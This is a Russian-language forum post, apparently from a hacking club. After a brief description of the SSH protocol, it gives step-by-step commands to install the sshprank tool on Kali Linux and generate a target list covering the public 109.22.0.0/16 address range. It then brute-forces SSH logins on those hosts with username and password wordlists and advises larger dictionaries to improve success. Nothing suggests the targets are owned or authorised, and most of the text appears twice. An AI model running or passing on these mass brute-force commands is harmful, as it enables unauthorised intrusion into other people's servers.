Download_Link
Участник клуба
SSH (Secure Shell) — сетевой протокол прикладного уровня, позволяющий производить удалённое управление операционной системой и туннелирование TCP-соединений (например, для передачи файлов). Данный протокол схож по функциональности с протоколами Telnet и rlogin, но, в отличие от них, шифрует весь трафик, включая и передаваемые пароли.
SSH позволяет безопасно передавать в незащищённой среде практически любой другой сетевой протокол. Таким образом, можно не только удаленно работать на компьютере через командную оболочку, но и передавать по шифрованному каналу звуковой поток или видео.
В данной статье мы разберемся, как просканировать получить доступ к большому количеству SSH-серверов с помощью программы sshprank. Программа производит поиск компьютеров с работающим SSH-соединением и пытается получить доступ, используя метод перебора.
Установка и эксплуатация
Открываем терминал Kali linux и выполняем обновление пакетов:
apt-get update && apt-get upgrade
Устанавливаем git и python:
sudo apt-get install git python3-pip
Клонируем инструмент с репозитория GitHub:
git clone https://github.com/noptrix/sshprank
Переходим в директорию инструмента:
cd sshprank
Устанавливаем все необходимые зависимости с помощью команды:
sudo pip3 install -r docs/requirements.txt
Теперь нам нужно создать список хостов, к которым мы будем пытаться подключиться по SSH-соединению. Для этого вводим команду:
echo -e 109.22.{0..255}.{0..255}"\n" | sed 's/ //' > council.txt
В фигурных скобках обозначен диапазон значений, которые будут сохранены текстовый файл под названием council.txt. К слову, вместо вышеперечисленного диапазона Вы можете задать свой.
После того, как мы создали файл с хостами, вводим команду команду:
sshprank -l council.txt -U lists/user.txt -P lists/pws.txt -v
Данная команда запустит процесс перебора для подключения по SSH-соединению к хостам (council.txt), используя базу логинов (lists/user.txt) и паролей (lists/pws.txt). Вместо стандартных словарей рекомендуется использовать более мощные, поскольку это увеличит эффективность.
SSH позволяет безопасно передавать в незащищённой среде практически любой другой сетевой протокол. Таким образом, можно не только удаленно работать на компьютере через командную оболочку, но и передавать по шифрованному каналу звуковой поток или видео.
В данной статье мы разберемся, как просканировать получить доступ к большому количеству SSH-серверов с помощью программы sshprank. Программа производит поиск компьютеров с работающим SSH-соединением и пытается получить доступ, используя метод перебора.
Установка и эксплуатация
Открываем терминал Kali linux и выполняем обновление пакетов:
apt-get update && apt-get upgrade
Устанавливаем git и python:
sudo apt-get install git python3-pip
Клонируем инструмент с репозитория GitHub:
git clone https://github.com/noptrix/sshprank
Переходим в директорию инструмента:
cd sshprank
Устанавливаем все необходимые зависимости с помощью команды:
sudo pip3 install -r docs/requirements.txt
Теперь нам нужно создать список хостов, к которым мы будем пытаться подключиться по SSH-соединению. Для этого вводим команду:
echo -e 109.22.{0..255}.{0..255}"\n" | sed 's/ //' > council.txt
В фигурных скобках обозначен диапазон значений, которые будут сохранены текстовый файл под названием council.txt. К слову, вместо вышеперечисленного диапазона Вы можете задать свой.
После того, как мы создали файл с хостами, вводим команду команду:
sshprank -l council.txt -U lists/user.txt -P lists/pws.txt -v
Данная команда запустит процесс перебора для подключения по SSH-соединению к хостам (council.txt), используя базу логинов (lists/user.txt) и паролей (lists/pws.txt). Вместо стандартных словарей рекомендуется использовать более мощные, поскольку это увеличит эффективность.